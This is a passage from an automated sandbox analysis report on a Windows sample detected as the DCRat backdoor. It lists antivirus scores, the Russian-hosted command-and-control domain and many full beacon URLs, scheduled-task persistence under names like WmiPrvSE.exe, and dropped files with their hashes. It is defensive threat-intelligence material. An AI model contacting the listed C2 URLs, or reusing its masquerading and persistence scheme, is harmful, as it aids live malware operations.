            C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe65%VirustotalBrowse
            C:\msPortRefnetdhcp\componentWininto.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\msPortRefnetdhcp\componentWininto.exe65%VirustotalBrowse

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://index.from.sh/pages/game.html0%Avira URL Cloudsafe
            http://a0947291.xsph.ruPo0%Avira URL Cloudsafe
            https://index.from.sh/pages/game.html0%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            a0947291.xsph.ru
            		141.8.194.74
            		truefalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://a0947291.xsph.ru/1606aca9.php?cucOyHPjcFsCiapNYlxb8AP6pF=a3qL3&vw0E6VKq1Z0QnGVYYOq=dzcegjt&zp=3ydwnyJbQmvHkZpB8uBecfsG&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&cucOyHPjcFsCiapNYlxb8AP6pF=a3qL3&vw0E6VKq1Z0QnGVYYOq=dzcegjt&zp=3ydwnyJbQmvHkZpB8uBecfsGfalse
                		high
                http://a0947291.xsph.ru/1606aca9.php?Va8TbDE3pURmmcb44lzH99wN=hAzBJZDaz2bjGSGnaj3&7jMwN3LmsuWnut3CP1f4OLxk9UyStej=2Ol8yDyQOasFfx&WYDXiE9vwvmw2E33OL6ugH5OMD=qxcrEMfc3&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&Va8TbDE3pURmmcb44lzH99wN=hAzBJZDaz2bjGSGnaj3&7jMwN3LmsuWnut3CP1f4OLxk9UyStej=2Ol8yDyQOasFfx&WYDXiE9vwvmw2E33OL6ugH5OMD=qxcrEMfc3false
                  		high
                  http://a0947291.xsph.ru/1606aca9.php?NmF4dcz1AZPsODb7c4ZJsHpxaH=XN7y&dCgr8zVnf24JM9e1=Ek3Y&HF7ReWWcoDkvPMgt9nivozNf=bmOSJW4Fs5auqV9RDO1j&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&NmF4dcz1AZPsODb7c4ZJsHpxaH=XN7y&dCgr8zVnf24JM9e1=Ek3Y&HF7ReWWcoDkvPMgt9nivozNf=bmOSJW4Fs5auqV9RDO1jfalse
                    		high
                    http://a0947291.xsph.ru/1606aca9.php?Kp0YJjcTuh6rHq0W3cybAgWVGNOKtko=Imszz&BTtKkvEZk=Up7qPN7oSeS&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&Kp0YJjcTuh6rHq0W3cybAgWVGNOKtko=Imszz&BTtKkvEZk=Up7qPN7oSeSfalse
                      		high
                      http://a0947291.xsph.ru/1606aca9.php?n8ux2yA6XyMoklAzV5ek7V=UqOdN8&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&n8ux2yA6XyMoklAzV5ek7V=UqOdN8false
                        		high
                        http://a0947291.xsph.ru/1606aca9.php?LB0fbF4jPSXn2GcGAitDf41seHeqJO=wQJizLUNdVtoEeR&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&LB0fbF4jPSXn2GcGAitDf41seHeqJO=wQJizLUNdVtoEeRfalse
                          		high
                          http://a0947291.xsph.ru/1606aca9.php?UDHxzzcas1EAv9DMmpw3fnZY=rCOtt0GvVNct1WrGn4NENdapnoSCQPr&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&UDHxzzcas1EAv9DMmpw3fnZY=rCOtt0GvVNct1WrGn4NENdapnoSCQPrfalse
                            		high
                            http://a0947291.xsph.ru/@=kTYjFmNwYTMfalse
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://cp.sprinthost.ruWmiPrvSE.exe, 00000023.00000002.2792046373.0000000003227000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000023.00000002.2792046373.0000000003124000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.0000000003254000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.0000000003164000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002FC3000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002B95000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://index.from.sh/pages/game.htmlWmiPrvSE.exe, 00000023.00000002.2792046373.0000000003227000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000023.00000002.2792046373.0000000003124000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.000000000352E000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.0000000003254000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.00000000034B1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.0000000003164000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002FC3000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002FC5000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002B95000.00000004.00000800.00020000.00000000.sdmpfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                http://a0947291.xsph.ruWmiPrvSE.exe, 00000023.00000002.2792046373.0000000003227000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000023.00000002.2792046373.0000000003459000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000023.00000002.2792046373.0000000003558000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000023.00000002.2792046373.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.00000000031E2000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.0000000003443000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.00000000030A8000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.0000000003334000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002A8E000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002E02000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002DD5000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002959000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002EF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://a0947291.xsph.ru/1606aca9.php?NmF4dcz1AZPsODb7c4ZJsHpxaH=XN7y&dCgr8zVnf24JM9e1=Ek3Y&HF7ReWWcoWmiPrvSE.exe, 00000026.00000002.3182465620.00000000031E2000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.00000000030A8000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.0000000003334000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://a0947291.xsph.ru/1606aca9.php?UDHxzzcas1EAv9DMmpw3fnZY=rCOtt0GvVNct1WrGn4NENdapnoSCQPr&79de6aWmiPrvSE.exe, 00000029.00000002.3409082832.0000000002A8E000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002DD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://cp.sprinthost.ru/auth/loginWmiPrvSE.exe, 00000023.00000002.2792046373.0000000003227000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000023.00000002.2792046373.0000000003124000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.0000000003254000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.00000000034B1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.0000000003164000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002FC3000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002B95000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://a0947291.xsph.ruPoWmiPrvSE.exe, 00000029.00000002.3409082832.0000000002E02000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://a0947291.xsph.ru/WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002959000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002EC3000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://a0947291.xsph.ru/1606aca9.php?cucOyHPjcFsCiapNYlxb8AP6pF=a3qL3&vw0E6VKq1Z0QnGVYYOq=dzcegjt&zpWmiPrvSE.exe, 00000023.00000002.2792046373.0000000003227000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000023.00000002.2792046373.0000000003459000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000023.00000002.2792046373.0000000002E81000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namecomponentWininto.exe, 00000008.00000002.1737716392.0000000003411000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000023.00000002.2792046373.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.000000000288B000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002959000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://a0947291.xsph.ru/1606aca9.php?n8ux2yA6XyMoklAzV5ek7V=UqOdN8&79de6aec23413a4ab0f953d98ee3ec95=WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002959000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3726045478.000000001BA53000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002BB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                141.8.194.74
                                                		a0947291.xsph.ruRussian Federation
                                                		35278SPRINTHOSTRUfalse

                                                General Information

                                                Joe Sandbox version:40.0.0 Tourmaline
                                                Analysis ID:1431492
                                                Start date and time:2024-04-25 10:16:09 +02:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 13m 54s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:45
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:4c6fK85tK7.exe
                                                renamed because original name is a hash value
                                                Original Sample Name:68DFE1E08B8CC7D19FF72334FDD09DB8.exe
                                                Detection:MAL
                                                Classification:mal100.troj.evad.winEXE@60/26@1/1
                                                EGA Information:
                                                • Successful, ratio: 10%
                                                HCA Information:Failed
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target MVPLoader.exe, PID 6768 because there are no executed function
                                                • Execution Graph export aborted for target WmiPrvSE.exe, PID 2992 because it is empty
                                                • Execution Graph export aborted for target WmiPrvSE.exe, PID 4076 because it is empty
                                                • Execution Graph export aborted for target WmiPrvSE.exe, PID 6112 because it is empty
                                                • Execution Graph export aborted for target WmiPrvSE.exe, PID 8044 because it is empty
                                                • Execution Graph export aborted for target componentWininto.exe, PID 7352 because it is empty
                                                • Execution Graph export aborted for target zufsVvjyWcGfJF.exe, PID 7896 because it is empty
                                                • Execution Graph export aborted for target zufsVvjyWcGfJF.exe, PID 8088 because it is empty
                                                • Execution Graph export aborted for target zufsVvjyWcGfJF.exe, PID 8120 because it is empty
                                                • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                09:17:06Task SchedulerRun new task: WmiPrvSE path: "C:\Users\Default User\Downloads\WmiPrvSE.exe"
                                                09:17:06Task SchedulerRun new task: WmiPrvSEW path: "C:\Users\Default User\Downloads\WmiPrvSE.exe"
                                                09:17:07Task SchedulerRun new task: zufsVvjyWcGfJF path: "C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe"
                                                09:17:07Task SchedulerRun new task: zufsVvjyWcGfJFz path: "C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe"
                                                10:18:50API Interceptor22x Sleep call for process: WmiPrvSE.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                141.8.194.74UYUuh7vsdN.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, VidarBrowse
                                                • a0891666.xsph.ru/setup.exe
                                                PO_75826.docGet hashmaliciousUnknownBrowse
                                                • a0857009.xsph.ru/macrisan2.1.exe
                                                Order_PO_001498.docGet hashmaliciousAgentTesla, NSISDropperBrowse
                                                • a0857009.xsph.ru/csDacTFVcVlight.exe
                                                QQhgg2sQI1.exeGet hashmaliciousUnknownBrowse
                                                • a0621298.xsph.ru/advert.msi
                                                sT4cF8rUxp.exeGet hashmaliciousUnknownBrowse
                                                • a0621298.xsph.ru/443.exe
                                                Za35fCUFau.exeGet hashmaliciousUnknownBrowse
                                                • a0621298.xsph.ru/RM.exe
                                                eIxMVDoQF3.exeGet hashmaliciousAmadey RedLine SmokeLoader Tofsee VidarBrowse
                                                • a0621298.xsph.ru/7.exe
                                                lEsEX3McwH.exeGet hashmaliciousBitCoin Miner RedLineBrowse
                                                • a0575239.xsph.ru/133722.exe

                                                Domains

                                                No context

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                SPRINTHOSTRUbquMe2ZSfj.exeGet hashmaliciousDCRatBrowse
                                                • 141.8.192.217
                                                lq0xQckZHP.exeGet hashmaliciousDCRatBrowse
                                                • 141.8.192.217
                                                8783013BDBB0B9D9093B06792388A23ADF9E6A2A1749B.exeGet hashmaliciousDCRatBrowse
                                                • 141.8.192.26
                                                joPS73cEOb.exeGet hashmaliciousDCRatBrowse
                                                • 141.8.192.217
                                                8KT3wKvQeO.exeGet hashmaliciousDCRatBrowse
                                                • 141.8.192.217
                                                BoTl06PDGl.exeGet hashmaliciousFormBookBrowse
                                                • 141.8.192.98
                                                9qjY1U1ssF.exeGet hashmaliciousDCRatBrowse
                                                • 141.8.194.74
                                                Ryf8vHLcLt.exeGet hashmaliciousDCRatBrowse
                                                • 141.8.194.149
                                                8icsOoCU5T.exeGet hashmaliciousDCRatBrowse
                                                • 141.8.194.74
                                                17j4ljcI3U.exeGet hashmaliciousDCRatBrowse
                                                • 141.8.192.126

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Recovery\e5c7b42f1665e5

                                                Download File
                                                Process:C:\msPortRefnetdhcp\componentWininto.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):234
                                                Entropy (8bit):5.773480710999957
                                                Encrypted:false
                                                SSDEEP:6:c8ZCqRqqV7I3fkSUUES87ZPnO1lRTupwFgikAPD7:cNG3V7KTmSgZPa3J7
                                                MD5:433CA2E4B83496CE9C5270BF160C2F42
                                                SHA1:91410D93A34EDF940BCC1BB3FFF6B4F1C1CEDEEF
                                                SHA-256:1098CCEF7B1F8602525A8DCAF18EE98D2CB2E39553D7C4D8DA8FCAFB38A92194
                                                SHA-512:5741A785EB9B6ABAA753437A0E34FDCD706703CB17665A5E1605DAB0F4061398E6238629C9F34240A0C7695507CDE7E8F13FFECCEED66C5819AEDEA518F3A567
                                                Malicious:false
                                                Preview:yamkkAPN8sQpuw9y7LwsUAoJgI3DuPWYEBd9iqwhahuYytRqpXWVqr3ywcDbHMdsV2ktTAQRYPRwQPUw1MYW2BrWHpMFmVZOEBD6JiXoHF7baGhhHRk5xHzUKNlnxKpDzCsPMYnSytPxDQ6BHp7Vuea7Lsw57t16Z4lXXSVtnSGE2CQ4RjfINUSVmvDdlrUF2SXJoinzUNrcXWEJc2oXNstFlQvmO1I67BMjoHPs6q

                                                C:\Recovery\zufsVvjyWcGfJF.exe

                                                Download File
                                                Process:C:\msPortRefnetdhcp\componentWininto.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):3550208
                                                Entropy (8bit):7.781657928203425
                                                Encrypted:false
                                                SSDEEP:49152:/wxmcexfNwuwHmIZCw/55uvWVdgv8XquMvQ0CC3QbYGpRFCwEg5/MPoxPr2G:4xmRwLHVZCC55YkdOsfMvBh0ND4wELW
                                                MD5:53758CEA18D59182A809208313D5042A
                                                SHA1:0234E732DEA00414C79CA2CE8A55F61843F282D2
                                                SHA-256:5CAE0557099A16D45A03F05F95390EC5BD5BA5A44EDD73286E741FE09F93BDDF
                                                SHA-512:3D7900C7A6060367BEAF7ABDE33027958D28091B001D25C395D191F0CF442216D5CACFF4A123BBD1AE767F471AE3A517659F9C42798BE8C772F2F7411A7B952E
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 88%
                                                • Antivirus: Virustotal, Detection: 65%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................5..6......>.6.. ... 6...@.. ........................6...........@...................................6.K....`6.......................6...................................................... ............... ..H............text...D.5.. ....5................. ..`.sdata.../... 6..0....5.............@....rsrc........`6......&6.............@..@.reloc........6......*6.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\Default\Downloads\24dbde2999530e

                                                Download File
                                                Process:C:\msPortRefnetdhcp\componentWininto.exe
                                                File Type:ASCII text, with very long lines (562), with no line terminators
                                                Category:dropped
                                                Size (bytes):562
                                                Entropy (8bit):5.8952955621465115
                                                Encrypted:false
                                                SSDEEP:12:WH93O0SwsHzjrBZUHYHoDx9tw/DCMIpatw925qFgfRyz:u93oTjVZuaoDJw/DCJOl5q2Zu
                                                MD5:C78955BB81189C5B3B0DAAE326638B8A
                                                SHA1:ABE3B17F418629B7CFAB1F62540BCE69AF656860
                                                SHA-256:CA18B092CF8C5569B8AE8D8C2BF9AD66C0C48862720FF258501BC7E0721F7AED
                                                SHA-512:B193F2B0E4811563FF82F04AB1292716E23FD9BF3F4A7EC8F9215B2142927ED68858B4AAA7E9A818C0A9B7AD0124CB3379DB0BA44973028395C21BEE5A49E21B
                                                Malicious:false
                                                Preview:gUtKfQlEwa9DslRWoHNglrfNfwkwOVarqRTQ45JmCUrdkIYzKTBXBc7yzgospzzaARXaRAcs8leQABmWYum4UDqOTebYRa6MeRdTv7iJ1SYa8qyy3RU5N5G7lJHwjDbhpRwthTlaMcDBoQPnqne9FB9jLgrm0vkx01vq3FQkq4su1ESV3dG6jcbnSNiBl9ja2PLxeitkW3TLSOrGOWsWpnOYZHYqhP9qUS2l2e0UufjpJQVDfbwPRNvOBwYXKCDH4m19WFOtfYlKEiPJvUKFcuZHhnjGGdJrbbvgYVrZNDt2llKdhOlz28pKNtctgImCO4snxsuanu2YAgf5dGi11TzdwkTp273Faror2gpyeLMHFQJqOgQZjvL4EP1MZFhp0x7T1yD6btWpHsXfbmaVrefpfumnpcYZogQSSzyZdT7zYfwW1VvxoL7WRSxHLaQ8V7BkbFMlxA2XgqRA7QvTrlvcj4AACrODD9eaeM4wJJ9nTjzlAxJ4o6QtMiBhEMjFwyUhL0gvW8KimHJ9EZ9OiTYGsvO5KWs6k31ePSZKRXhqvsHFYC

                                                C:\Users\Default\Downloads\WmiPrvSE.exe

                                                Download File
                                                Process:C:\msPortRefnetdhcp\componentWininto.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):3550208
                                                Entropy (8bit):7.781657928203425
                                                Encrypted:false
                                                SSDEEP:49152:/wxmcexfNwuwHmIZCw/55uvWVdgv8XquMvQ0CC3QbYGpRFCwEg5/MPoxPr2G:4xmRwLHVZCC55YkdOsfMvBh0ND4wELW
                                                MD5:53758CEA18D59182A809208313D5042A
                                                SHA1:0234E732DEA00414C79CA2CE8A55F61843F282D2
                                                SHA-256:5CAE0557099A16D45A03F05F95390EC5BD5BA5A44EDD73286E741FE09F93BDDF
                                                SHA-512:3D7900C7A6060367BEAF7ABDE33027958D28091B001D25C395D191F0CF442216D5CACFF4A123BBD1AE767F471AE3A517659F9C42798BE8C772F2F7411A7B952E
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 88%
                                                • Antivirus: Virustotal, Detection: 65%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................5..6......>.6.. ... 6...@.. ........................6...........@...................................6.K....`6.......................6...................................................... ............... ..H............text...D.5.. ....5................. ..`.sdata.../... 6..0....5.............@....rsrc........`6......&6.............@..@.reloc........6......*6.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\componentWininto.exe.log

                                                Download File
                                                Process:C:\msPortRefnetdhcp\componentWininto.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1915
                                                Entropy (8bit):5.363869398054153
                                                Encrypted:false
                                                SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpvJHVHmHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkhtpB1Gq2
                                                MD5:5D3E8414C47C0F4A064FA0043789EC3E
                                                SHA1:CF7FC44D13EA93E644AC81C5FE61D6C8EDFA41B0
                                                SHA-256:4FDFF52E159C9D420E13E429CCD2B40025A0110AD84DC357BE17E21654BEEBC7
                                                SHA-512:74D567BBBA09EDF55D2422653F6647DCFBA8EF6CA0D4DBEBD91E3CA9B3A278C99FA52832EDF823F293C416053727D0CF15F878EC1278E62524DA1513DA4AC6AF
                                                Malicious:false
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\zufsVvjyWcGfJF.exe.log

                                                Download File
                                                Process:C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe
                                                File Type:CSV text
                                                Category:dropped
                                                Size (bytes):1281
                                                Entropy (8bit):5.370111951859942
                                                Encrypted:false
                                                SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                Malicious:false
